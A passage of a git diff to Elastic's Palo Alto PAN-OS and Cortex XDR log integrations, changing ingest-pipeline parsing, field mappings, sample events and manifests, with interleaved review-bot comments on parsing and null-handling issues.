b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json @@ -37195,7 +37195,6 @@ "start": "2023-10-04T09:50:19.000Z", "timezone": "UTC", "type": [ - "denied", "denied", "connection" ] @@ -37739,4 +37738,4 @@ ] } ] -} \ No newline at end of file +} diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-tunnel-inspection-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-tunnel-inspection-sample.log-expected.json index a0ef131c8c3..60d5eb48c6b 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-tunnel-inspection-sample.log-expected.json 
+++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-tunnel-inspection-sample.log-expected.json @@ -174,6 +174,9 @@ "name": "rule1", "uuid": "100" }, + "session": { + "start_time": "1000-01-01T00:00:00.000Z" + }, "source": { "bytes": 10, "geo": { diff --git a/packages/panw/data_stream/panos/elasticsearch/ingest_pipeline/config.yml b/packages/panw/data_stream/panos/elasticsearch/ingest_pipeline/config.yml index 076db95d445..e5fdf147e69 100644 --- a/packages/panw/data_stream/panos/elasticsearch/ingest_pipeline/config.yml +++ b/packages/panw/data_stream/panos/elasticsearch/ingest_pipeline/config.yml @@ -4,7 +4,25 @@ description: Pipeline for PanOS Config Logs. processors: - csv: field: message + target_fields: + - panw.panos.host.ip + - panw.panos.virtual_sys + - panw.panos.cmd + - panw.panos.admin + - panw.panos.client_type + - panw.panos.result + - panw.panos.path + - _temp_.check_field + - convert: + field: _temp_.check_field + type: long + ignore_missing: true ignore_failure: true + - csv: + field: message + trim: true + tag: panw.panos.config_parse_custom + if: "!(ctx._temp_?.check_field instanceof Number)" target_fields: - panw.panos.host.ip - panw.panos.virtual_sys 
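Review bot: The `ignore_failure: true` that used to belong to the csv processor now sits under the new `convert` step, so neither the eight-field probe csv nor the parser tagged `panw.panos.config_parse_custom` (nor the standard-format parser in the next hunk) tolerates a parse error any more; a config log whose before-change-detail carries an unbalanced `"` would now fail the processor instead of being parsed best-effort as before. If that is intended so the failure surfaces through the pipeline's error handling, a comment saying so would help; otherwise restore `ignore_failure: true` on the two parsing csv processors. The format detection also hinges on the eighth field converting to a long, so a custom-format event whose before-change-detail is purely numeric would be routed through the standard parser with every following field shifted; this deserves a comment on the `convert` step such as `# Field 8 is $seqno (numeric) in the standard format and $before-change-detail in the custom one; a numeric change detail is misclassified as standard.`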
@@ -25,7 +43,33 @@ processors: - panw.panos.device_name - panw.panos.device_group_id - panw.panos.comment - + - _temp_.future_use1 + - _temp_.high_res_timestamp + - csv: + field: message + trim: true + tag: panw.panos.config_parse_standard + if: "ctx._temp_?.check_field instanceof Number" + target_fields: + - panw.panos.host.ip + - panw.panos.virtual_sys + - panw.panos.cmd + - panw.panos.admin + - panw.panos.client_type + - panw.panos.result + - panw.panos.path + - panw.panos.sequence_number + - panw.panos.action_flags + - panw.panos.device_group_hierarchy1 + - panw.panos.device_group_hierarchy2 + - panw.panos.device_group_hierarchy3 + - panw.panos.device_group_hierarchy4 + - panw.panos.vsys_name + - panw.panos.device_name + - panw.panos.device_group_id + - panw.panos.comment + - _temp_.future_use1 + - _temp_.high_res_timestamp - script: description: Set Event Action. lang: painless diff --git a/packages/panw/data_stream/panos/elasticsearch/ingest_pipeline/default.yml b/packages/panw/data_stream/panos/elasticsearch/ingest_pipeline/default.yml index 73139b92cc1..7122b773f2e 100644 --- a/packages/panw/data_stream/panos/elasticsearch/ingest_pipeline/default.yml +++ b/packages/panw/data_stream/panos/elasticsearch/ingest_pipeline/default.yml 
@@ -104,24 +104,26 @@ processors: field: _temp_.srcuser ignore_missing: true patterns: - - '^%{HOSTNAME:source.user.domain}\\%{USERNAME:source.user.name}$' - - '^%{HOSTNAME:source.user.domain}\\\\%{USERNAME:source.user.name}$' - - '^%{USERNAME:source.user.name}@%{HOSTNAME:source.user.domain}$' + - '^%{PATRUNKATEDHOSTNAME:source.user.domain}\\%{USERNAME:source.user.name}$' + - '^%{PATRUNKATEDHOSTNAME:source.user.domain}\\\\%{USERNAME:source.user.name}$' + - '^%{USERNAME:source.user.name}@%{PATRUNKATEDHOSTNAME:source.user.domain}$' - '^%{USERNAME:source.user.name}$' pattern_definitions: - USERNAME: '[ a-zA-Z0-9._-]+[$]?' + USERNAME: '[ a-zA-Z0-9#.:_\-]+[$]?' + PATRUNKATEDHOSTNAME: '(?:\.{0,1}|\b(?:[0-9A-Za-z_][0-9A-Za-z_\-]{0,62})(?:\.{1,2}(?:[0-9A-Za-z_][0-9A-Za-z_\-]{0,62}))*(\.?|\b))' if: ctx._temp_?.srcuser != null - grok: field: _temp_.dstuser ignore_missing: true patterns: - - '^%{HOSTNAME:destination.user.domain}\\%{USERNAME:destination.user.name}$' - - '^%{HOSTNAME:destination.user.domain}\\\\%{USERNAME:destination.user.name}$' - - '^%{USERNAME:destination.user.name}@%{HOSTNAME:destination.user.domain}$' + - '^%{PATRUNKATEDHOSTNAME:destination.user.domain}\\%{USERNAME:destination.user.name}$' + - '^%{PATRUNKATEDHOSTNAME:destination.user.domain}\\\\%{USERNAME:destination.user.name}$' + - '^%{USERNAME:destination.user.name}@%{PATRUNKATEDHOSTNAME:destination.user.domain}$' - '^%{USERNAME:destination.user.name}$' pattern_definitions: - USERNAME: '[ a-zA-Z0-9._-]+[$]?' + USERNAME: '[ a-zA-Z0-9#.:_\-]+[$]?' + PATRUNKATEDHOSTNAME: '(?:\.{0,1}|\b(?:[0-9A-Za-z_][0-9A-Za-z_\-]{0,62})(?:\.{1,2}(?:[0-9A-Za-z_][0-9A-Za-z_\-]{0,62}))*(\.?|\b))' if: ctx._temp_?.dstuser != null - set: 
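Review bot: Widening `USERNAME` to accept `:` lets the PAN-OS X-Forwarded-For marker match as a user name: the threat-sample fixture earlier in this diff now has `source.user.name` and `related.user` set to `x-fwd-for: 10.10.10.50`, so an IP-bearing string lands in the user entity fields that correlation and detection rules pivot on. The `x_forwarded_for` boolean in fields.yml suggests the pipeline handles that prefix somewhere, but whatever does so evidently does not run before this grok for that sample; either strip the `x-fwd-for:` form ahead of these two grok steps or exclude it in the guard, e.g. `if: ctx._temp_?.srcuser != null && !ctx._temp_.srcuser.startsWith('x-fwd-for:')` (and the same for `_temp_.dstuser`). Separately, `PATRUNKATEDHOSTNAME` looks like a misspelling of "truncated", and its first alternative `\.{0,1}` matches the empty string, so a `\user` value is accepted with an empty domain; a one-line comment stating what `\.{1,2}` and the 63-character labels are meant to admit would make the pattern reviewable.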
@@ -330,6 +332,22 @@ processors: - append: field: error.message value: '{{{_ingest.on_failure_message}}}' + - set: + if: ctx.panw?.panos?.parent_session?.start_time != null + field: session.start_time + value: '{{{panw.panos.parent_session.start_time}}}' + +# Remove NAT fields when translation was not done. + - remove: + field: + - source.nat.ip + - source.nat.port + if: ctx.source?.nat?.ip == '0.0.0.0' && ctx.source.nat.port == '0' + - remove: + field: + - destination.nat.ip + - destination.nat.port + if: ctx.destination?.nat?.ip == '0.0.0.0' && ctx.destination.nat.port == '0' # convert IP fields as the output of the CSV processor is always a string. - convert: @@ -1152,6 +1170,7 @@ processors: if: ctx.panw?.panos?.sub_type == 'drop' - append: field: event.type + allow_duplicates: false value: - denied - connection @@ -1162,6 +1181,7 @@ processors: if: ctx.panw?.panos?.sub_type == 'deny' - append: field: event.type + allow_duplicates: false value: - denied - connection @@ -1494,6 +1514,11 @@ processors: allow_duplicates: false value: '{{{destination.user.name}}}' if: ctx.destination?.user?.name != null + - append: + field: related.user + allow_duplicates: false + value: '{{{panw.panos.admin}}}' + if: ctx.panw?.panos?.admin != null - append: field: related.hash allow_duplicates: false @@ -1546,17 +1571,6 @@ processors: - _temp_ - _conf ignore_missing: true -# Remove NAT fields when translation was not done. - - remove: - field: - - source.nat.ip - - source.nat.port - if: ctx.source?.nat?.ip == '0.0.0.0' && ctx.source.nat.port == 0 - - remove: - field: - - destination.nat.ip - - destination.nat.port - if: ctx.destination?.nat?.ip == '0.0.0.0' && ctx.destination.nat.port == 0 # Remove panw.panos fields that are copied into an ECS field. - remove: diff --git a/packages/panw/data_stream/panos/fields/fields.yml b/packages/panw/data_stream/panos/fields/fields.yml index 4f5131916f6..28a4e43064b 100644 --- a/packages/panw/data_stream/panos/fields/fields.yml 
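Review bot: The new `set` copies `panw.panos.parent_session.start_time` into `session.start_time` whenever it is present, and the tunnel-inspection fixture in this diff now carries `session.start_time: 1000-01-01T00:00:00.000Z`, which reads as the firewall's placeholder for "no parent session" rather than a real start time; indexed as a date it will surface in any `session.start_time` range query or timeline as an event from the year 1000. Consider excluding that placeholder in the `if:` (comparing against whatever form the value has at this point of the pipeline), and, if the field is already a date by then, using `copy_from` instead of a mustache template so the type is preserved. The relocated NAT-removal processors now compare `port == '0'` because they run before the convert step; a comment such as `# nat.port is still a string here, the convert step runs later` would stop the next reader from restoring the integer comparison this change removes.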
+++ b/packages/panw/data_stream/panos/fields/fields.yml @@ -1043,3 +1043,6 @@ type: boolean - name: x_forwarded_for type: boolean +- name: session.start_time + type: date + description: Time of session start. diff --git a/packages/panw/data_stream/panos/sample_event.json b/packages/panw/data_stream/panos/sample_event.json index 930e6f7d2a6..8e0fe3af61b 100644 --- a/packages/panw/data_stream/panos/sample_event.json +++ b/packages/panw/data_stream/panos/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2012-04-10T04:39:56.000Z", "agent": { - "ephemeral_id": "3a362c46-abee-4440-bd82-f0e41a651188", - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "ephemeral_id": "be1891e7-30b4-4f85-b31e-e719ee92c1ea", + "id": "bf959e04-184d-48cb-92c0-4f7f748a2cc0", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.12.1" }, "data_stream": { "dataset": "panw.panos", @@ -34,9 +34,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "id": "bf959e04-184d-48cb-92c0-4f7f748a2cc0", "snapshot": false, - "version": "8.10.1" + "version": "8.12.1" }, "event": { "action": "url_filtering", @@ -48,7 +48,7 @@ ], "created": "2012-10-30T09:46:12.000Z", "dataset": "panw.panos", - "ingested": "2023-09-26T16:43:58Z", + "ingested": "2024-03-11T17:57:37Z", "kind": "alert", "original": "<14>Nov 30 16:09:08 PA-220 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "outcome": "success", @@ -68,7 +68,7 @@ "log": { "level": "informational", "source": { - "address": "192.168.80.7:47488" + "address": "172.18.0.4:53212" }, "syslog": { "facility": { 
@@ -135,8 +135,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -169,4 +168,4 @@ "user": { "name": "crusher" } -} +} \ No newline at end of file diff --git a/packages/panw/docs/README.md b/packages/panw/docs/README.md index aad92bf0210..1ab8906abfa 100644 --- a/packages/panw/docs/README.md +++ b/packages/panw/docs/README.md @@ -12,6 +12,8 @@ This integration is for Palo Alto Networks PAN-OS firewall monitoring logs recei - This integration supports logs of Tunnel Inspection for PAN-OS version 9.1 or above. +- This integration supports logs of configuration changes with and without details about the changed configuration(`before-change-detail` and `after-change-detail`). Please read [Note](#note) for more details. + - This module has been tested with logs generated by devices running PAN-OS versions 7.1 to 11.0. ## Configurations 
@@ -23,6 +25,8 @@ To configure syslog monitoring, please follow the steps mentioned in the [_Confi - It can be found under Advanced Options and can be configured as per requirements. The default value of `max_message_size` is set to 50KiB. - If the TCP input is used, it is recommended that PAN-OS is configured to send syslog messages using the IETF (RFC 5424) format. In addition, RFC 6587 framing (Octet Counting) will be enabled by default on the TCP input. +- If you want to see the configuration before and after the change(fields `before-change-detail` and `after-change-detail`) in the [config-log](https://docs.paloaltonetworks.com/pan-os/11-1/pan-os-admin/monitoring/use-syslog-for-monitoring/syslog-field-descriptions/config-log-fields), please use the following [custom log format in the syslog server profile](https://docs.paloaltonetworks.com/pan-os/11-1/pan-os-admin/monitoring/use-syslog-for-monitoring/syslog-field-descriptions/custom-logevent-format): + ``1,$receive_time,$serial,$type,$subtype,2561,$time_generated,$host,$vsys,$cmd,$admin,$client,$result,$path,$before-change-detail,$after-change-detail,$seqno,$actionflags,$dg_hier_level_1,$dg_hier_level_2,$dg_hier_level_3,$dg_hier_level_4,$vsys_name,$device_name,$dg_id,$comment,0,$high_res_timestamp`` ## Logs @@ -36,11 +40,11 @@ An example event for `panos` looks as following: { "@timestamp": "2012-04-10T04:39:56.000Z", "agent": { - "ephemeral_id": "3a362c46-abee-4440-bd82-f0e41a651188", - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "ephemeral_id": "be1891e7-30b4-4f85-b31e-e719ee92c1ea", + "id": "bf959e04-184d-48cb-92c0-4f7f748a2cc0", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.12.1" }, "data_stream": { "dataset": "panw.panos", 
@@ -69,9 +73,9 @@ An example event for `panos` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "id": "bf959e04-184d-48cb-92c0-4f7f748a2cc0", "snapshot": false, - "version": "8.10.1" + "version": "8.12.1" }, "event": { "action": "url_filtering", @@ -83,7 +87,7 @@ An example event for `panos` looks as following: ], "created": "2012-10-30T09:46:12.000Z", "dataset": "panw.panos", - "ingested": "2023-09-26T16:43:58Z", + "ingested": "2024-03-11T17:57:37Z", "kind": "alert", "original": "<14>Nov 30 16:09:08 PA-220 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "outcome": "success", @@ -103,7 +107,7 @@ An example event for `panos` looks as following: "log": { "level": "informational", "source": { - "address": "192.168.80.7:47488" + "address": "172.18.0.4:53212" }, "syslog": { "facility": { @@ -170,8 +174,7 @@ An example event for `panos` looks as following: "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -205,7 +208,6 @@ An example event for `panos` looks as following: "name": "crusher" } } - ``` **Exported fields** 
@@ -654,6 +656,7 @@ An example event for `panos` looks as following: | server.port | Port of the server. | long | | server.user.name | Short name or login of the user. | keyword | | server.user.name.text | Multi-field of `server.user.name`. | match_only_text | +| session.start_time | Time of session start. | date | | source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | | source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | | source.as.organization.name | Organization name. | keyword | diff --git a/packages/panw/manifest.yml b/packages/panw/manifest.yml index 8a2f31b1636..3f469f4b199 100644 --- a/packages/panw/manifest.yml +++ b/packages/panw/manifest.yml @@ -1,9 +1,9 @@ name: panw title: Palo Alto Next-Gen Firewall -version: "3.21.2" +version: "3.24.2" description: Collect logs from Palo Alto next-gen firewalls with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: [security, network] conditions: kibana: diff --git a/packages/panw_cortex_xdr/_dev/deploy/docker/http-mock-config.yml b/packages/panw_cortex_xdr/_dev/deploy/docker/http-mock-config.yml index dd6c2a4d2c2..c1c470dc7c6 100644 --- a/packages/panw_cortex_xdr/_dev/deploy/docker/http-mock-config.yml +++ b/packages/panw_cortex_xdr/_dev/deploy/docker/http-mock-config.yml @@ -170,13 +170,8 @@ rules: headers: Content-Type: - application/json - body: >- + body: |- { - - - - - "reply": { "total_count": 390, "result_count": 1, diff --git a/packages/panw_cortex_xdr/changelog.yml b/packages/panw_cortex_xdr/changelog.yml index aac02ff3feb..b1753f9e9b5 100644 --- a/packages/panw_cortex_xdr/changelog.yml 
+++ b/packages/panw_cortex_xdr/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.25.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 +- version: "1.24.2" + changes: + - description: Clean up null handling + type: bugfix + link: https://github.com/elastic/integrations/pull/9175 - version: "1.24.1" changes: - description: Changed owners diff --git a/packages/panw_cortex_xdr/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml b/packages/panw_cortex_xdr/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml index f55bb770671..669d88bcc9c 100644 --- a/packages/panw_cortex_xdr/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml +++ b/packages/panw_cortex_xdr/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml @@ -22,7 +22,7 @@ processors: field: event.original target_field: panw_cortex.xdr - drop: - if: ctx.panw_cortex?.xdr?.reply?.result_count != null && ctx.panw_cortex?.xdr?.reply?.result_count == 0 + if: ctx.panw_cortex?.xdr?.reply?.result_count == 0 - fingerprint: fields: - panw_cortex.xdr.events.event_timestamp 
@@ -113,16 +113,16 @@ processors: field: panw_cortex.xdr.description target_field: event.reason ignore_missing: true - if: "ctx.panw_cortex?.xdr?.description != null && ctx.panw_cortex.xdr.description instanceof String" + if: ctx.panw_cortex?.xdr?.description instanceof String - rename: field: panw_cortex.xdr.description target_field: panw_cortex.xdr.bioc_description ignore_missing: true - if: "ctx.event?.reason == null && ctx.panw_cortex?.xdr?.description != null && ctx.panw_cortex?.xdr?.description instanceof List" + if: ctx.event?.reason == null && ctx.panw_cortex?.xdr?.description instanceof List - set: field: event.reason value: Bioc Event - if: "ctx.event?.reason == null && ctx.panw_cortex?.xdr?.bioc_description != null" + if: ctx.event?.reason == null && ctx.panw_cortex?.xdr?.bioc_description != null - rename: field: panw_cortex.xdr.agent_device_domain target_field: host.domain 
@@ -189,26 +189,26 @@ processors: description: "Extract Mitre Techniques and append it to Threat ECS fields" source: |- void addTechnique(def ctx, def x, def y) { - if (ctx?.threat == null) { + if (ctx.threat == null) { ctx.threat = new HashMap(); } - if (ctx?.threat.technique == null) { + if (ctx.threat.technique == null) { ctx.threat.technique = new HashMap(); } - if (ctx?.threat.technique.id == null) { + if (ctx.threat.technique.id == null) { ctx.threat.technique.id = new ArrayList(); } - if (ctx?.threat.technique.name == null) { + if (ctx.threat.technique.name == null) { ctx.threat.technique.name = new ArrayList(); } - if (!ctx.threat?.technique?.id.contains(x)) { + if (!ctx.threat.technique.id.contains(x)) { ctx.threat.technique.id.add(x); } - if (!ctx.threat?.technique?.name.contains(y)) { + if (!ctx.threat.technique.name.contains(y)) { ctx.threat.technique.name.add(y); } } - for (mitre_technique in ctx.panw_cortex?.xdr?.mitre_technique_id_and_name) { + for (mitre_technique in ctx.panw_cortex.xdr.mitre_technique_id_and_name) { addTechnique(ctx, mitre_technique.splitOnToken(' - ')[0], mitre_technique.splitOnToken(' - ')[1]); } - script: 
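Review bot: The loop `for (mitre_technique in ctx.panw_cortex.xdr.mitre_technique_id_and_name)` now hard-dereferences the field, and when `mitre_technique_id_and_name` is absent the for-each runs over null, which Painless is likely to reject with a null pointer error; the old `?.` chain produced the same null, so this is only safe if the script processor carries an `if:` guard, which would sit outside this hunk. If it does not, add `if: ctx.panw_cortex?.xdr?.mitre_technique_id_and_name != null` to the processor (or wrap the loop in `if (ctx.panw_cortex.xdr.mitre_technique_id_and_name != null) { ... }`). The same applies to the tactic loop in the following hunk and to both loops in the incidents pipeline at `@@ -123,7` and `@@ -151,7`. `splitOnToken(' - ')[1]` also still throws when a value lacks the separator, though that predates this change.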
@@ -217,32 +217,32 @@ processors: description: "Extract Mitre Tactics and append it to Threat ECS fields" source: |- void addTactic(def ctx, def x, def y) { - if (ctx?.threat == null) { - ctx.threat = new HashMap(); + if (ctx.threat == null) { + ctx.threat = new HashMap(); } - if (ctx?.threat.tactic == null) { - ctx.threat.tactic = new HashMap(); + if (ctx.threat.tactic == null) { + ctx.threat.tactic = new HashMap(); } - if (ctx?.threat.tactic.id == null) { - ctx.threat.tactic.id = new ArrayList(); + if (ctx.threat.tactic.id == null) { + ctx.threat.tactic.id = new ArrayList(); } - if (ctx?.threat.tactic.name == null) { - ctx.threat.tactic.name = new ArrayList(); + if (ctx.threat.tactic.name == null) { + ctx.threat.tactic.name = new ArrayList(); } - if (!ctx.threat?.tactic?.id.contains(x)) { - ctx.threat.tactic.id.add(x); + if (!ctx.threat.tactic.id.contains(x)) { + ctx.threat.tactic.id.add(x); } - if (!ctx.threat?.tactic?.name.contains(y)) { - ctx.threat.tactic.name.add(y); + if (!ctx.threat.tactic.name.contains(y)) { + ctx.threat.tactic.name.add(y); } } - for (mitre_tactic in ctx.panw_cortex?.xdr?.mitre_tactic_id_and_name) { - addTactic(ctx, mitre_tactic.splitOnToken(' - ')[0], mitre_tactic.splitOnToken(' - ')[1]); + for (mitre_tactic in ctx.panw_cortex.xdr.mitre_tactic_id_and_name) { + addTactic(ctx, mitre_tactic.splitOnToken(' - ')[0], mitre_tactic.splitOnToken(' - ')[1]); } - set: field: threat.framework value: "MITRE ATT&CK" - if: "ctx.threat?.technique != null || ctx.threat?.tactic != null" + if: ctx.threat?.technique != null || ctx.threat?.tactic != null #The Action actor is an an activity that took place and was recorded by the agent. - convert: field: panw_cortex.xdr.events.action_remote_ip 
@@ -417,11 +417,11 @@ processors: - set: field: user.email copy_from: panw_cortex.xdr.events.user_name - if: "ctx.panw_cortex?.xdr?.events?.user_name != null && (ctx.panw_cortex?.xdr?.events?.user_name instanceof String) && (ctx.panw_cortex?.xdr?.events?.user_name.contains('@')) && (ctx.panw_cortex?.xdr?.events?.user_name.contains('.'))" + if: ctx.panw_cortex?.xdr?.events?.user_name instanceof String && ctx.panw_cortex.xdr.events.user_name.contains('@') && ctx.panw_cortex.xdr.events.user_name.contains('.') - set: field: user.id copy_from: panw_cortex.xdr.events.user_name - if: "ctx.panw_cortex?.xdr?.events?.user_name != null && (ctx.panw_cortex?.xdr?.events?.user_name instanceof String) && (ctx.panw_cortex?.xdr?.events?.user_name.contains('@')) && (ctx.panw_cortex?.xdr?.events?.user_name.contains('.'))" + if: ctx.panw_cortex?.xdr?.events?.user_name instanceof String && ctx.panw_cortex.xdr.events.user_name.contains('@') && ctx.panw_cortex.xdr.events.user_name.contains('.') - remove: field: panw_cortex.xdr.events.user_name ignore_missing: true @@ -448,15 +448,15 @@ processors: - set: field: email.subject copy_from: panw_cortex.xdr.events.fw_email_subject - if: "ctx?.panw_cortex.xdr?.events?.fw_email_subject != null" + if: ctx.panw_cortex.xdr?.events?.fw_email_subject != null - append: field: email.from.address value: "{{{panw_cortex.xdr.events.fw_email_sender}}}" - if: "ctx?.panw_cortex.xdr?.events?.fw_email_sender != null" + if: ctx.panw_cortex.xdr?.events?.fw_email_sender != null - append: field: email.to.address value: "{{{panw_cortex.xdr.events.fw_email_recipient}}}" - if: "ctx?.panw_cortex.xdr?.events?.fw_email_recipient != null" + if: ctx.panw_cortex.xdr?.events?.fw_email_recipient != null - geoip: field: source.ip target_field: source.geo 
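Review bot: The conditions `ctx.panw_cortex.xdr?.events?.fw_email_subject != null` (and the `fw_email_sender` and `fw_email_recipient` ones below it) mix a hard dereference of `panw_cortex` with null-safe access on the rest of the chain, which is a different idiom from the fully null-safe `ctx.panw_cortex?.xdr?.events?.user_name` used in the preceding hunk. Either form works once the json processor has populated `panw_cortex.xdr`, but a single consistent style makes the null-handling intent easier to audit across the pipeline. Suggest `if: ctx.panw_cortex?.xdr?.events?.fw_email_subject != null` and the same shape for the other two.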
@@ -558,7 +558,7 @@ processors:
 ignore_missing: true
 - remove:
 field: event.original
- if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))"
+ if: ctx.tags?.contains('preserve_original_event') != true
 ignore_failure: true
 ignore_missing: true
 on_failure:
diff --git a/packages/panw_cortex_xdr/data_stream/alerts/manifest.yml b/packages/panw_cortex_xdr/data_stream/alerts/manifest.yml
index 82d8943c705..2d95741ed64 100644
--- a/packages/panw_cortex_xdr/data_stream/alerts/manifest.yml
+++ b/packages/panw_cortex_xdr/data_stream/alerts/manifest.yml
@@ -19,12 +19,13 @@ streams:
 show_user: false
 description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details.
 - name: api_token
- type: text
+ type: password
 title: Palo Alto Cortex XDR API Token
 multi: false
 required: true
 show_user: true
 description: API token from the XDR UI.
+ secret: true
 - name: token_id
 type: text
 title: Palo Alto Cortex XDR API Token ID
@@ -33,6 +34,7 @@ streams:
 show_user: true
 default: 1
 description: The token ID related to the above API token
+ secret: false
 - name: advanced_sec_level
 type: bool
 title: Advanced security level
diff --git a/packages/panw_cortex_xdr/data_stream/incidents/elasticsearch/ingest_pipeline/default.yml b/packages/panw_cortex_xdr/data_stream/incidents/elasticsearch/ingest_pipeline/default.yml
index 2df1e4335a4..d243809102b 100644
--- a/packages/panw_cortex_xdr/data_stream/incidents/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/panw_cortex_xdr/data_stream/incidents/elasticsearch/ingest_pipeline/default.yml
@@ -123,7 +123,7 @@ processors:
 ctx.threat.technique.name.add(y);
 }
 }
- for (mitre_technique in ctx.panw_cortex?.xdr?.mitre_techniques_ids_and_names) {
+ for (mitre_technique in ctx.panw_cortex.xdr.mitre_techniques_ids_and_names) {
 addTechnique(ctx, mitre_technique.splitOnToken(' - ')[0], mitre_technique.splitOnToken(' - ')[1]);
 }
 - script:
@@ -151,7 +151,7 @@ processors:
 ctx.threat.tactic.name.add(y);
 }
 }
- for (mitre_tactic in ctx.panw_cortex?.xdr?.mitre_tactics_ids_and_names) {
+ for (mitre_tactic in ctx.panw_cortex.xdr.mitre_tactics_ids_and_names) {
 addTactic(ctx, mitre_tactic.splitOnToken(' - ')[0], mitre_tactic.splitOnToken(' - ')[1]);
 }
 - set:
@@ -202,7 +202,7 @@ processors:
 ignore_missing: true
 - remove:
 field: event.original
- if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))"
+ if: ctx.tags?.contains('preserve_original_event') != true
 ignore_failure: true
 ignore_missing: true
 on_failure:
diff --git a/packages/panw_cortex_xdr/data_stream/incidents/manifest.yml b/packages/panw_cortex_xdr/data_stream/incidents/manifest.yml
index daa36819377..5c382801ed0 100644
--- a/packages/panw_cortex_xdr/data_stream/incidents/manifest.yml
+++ b/packages/panw_cortex_xdr/data_stream/incidents/manifest.yml
@@ -19,12 +19,13 @@ streams:
 show_user: false
 description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details.
 - name: api_token
- type: text
+ type: password
 title: Palo Alto Cortex XDR API Token
 multi: false
 required: true
 show_user: true
 description: API token from the XDR UI.
+ secret: true
 - name: token_id
 type: text
 title: Palo Alto Cortex XDR API Token ID
@@ -33,6 +34,7 @@ streams:
 show_user: true
 default: 1
 description: The token ID related to the above API token
+ secret: false
 - name: advanced_sec_level
 type: bool
 title: Advanced security level
diff --git a/packages/panw_cortex_xdr/manifest.yml b/packages/panw_cortex_xdr/manifest.yml
index 051aab2cb91..2cb7d9987d4 100644
--- a/packages/panw_cortex_xdr/manifest.yml
+++ b/packages/panw_cortex_xdr/manifest.yml
@@ -1,13 +1,13 @@
 name: panw_cortex_xdr
 title: Palo Alto Cortex XDR
-version: "1.24.1"
+version: "1.25.0"
 description: Collect logs from Palo Alto Cortex XDR with Elastic Agent.
 type: integration
-format_version: "3.0.0"
+format_version: "3.0.2"
 categories: [security, edr_xdr]
 conditions:
 kibana:
- version: ^8.7.1
+ version: ^8.12.0
 icons:
 - src: /img/icon-cortex.svg
 title: Palo Alto
diff --git a/packages/pfsense/_dev/deploy/docker/docker-compose.yml b/packages/pfsense/_dev/deploy/docker/docker-compose.yml
index 5278b8f5801..cc6a5c267dc 100644
--- a/packages/pfsense/_dev/deploy/docker/docker-compose.yml
+++ b/packages/pfsense/_dev/deploy/docker/docker-compose.yml
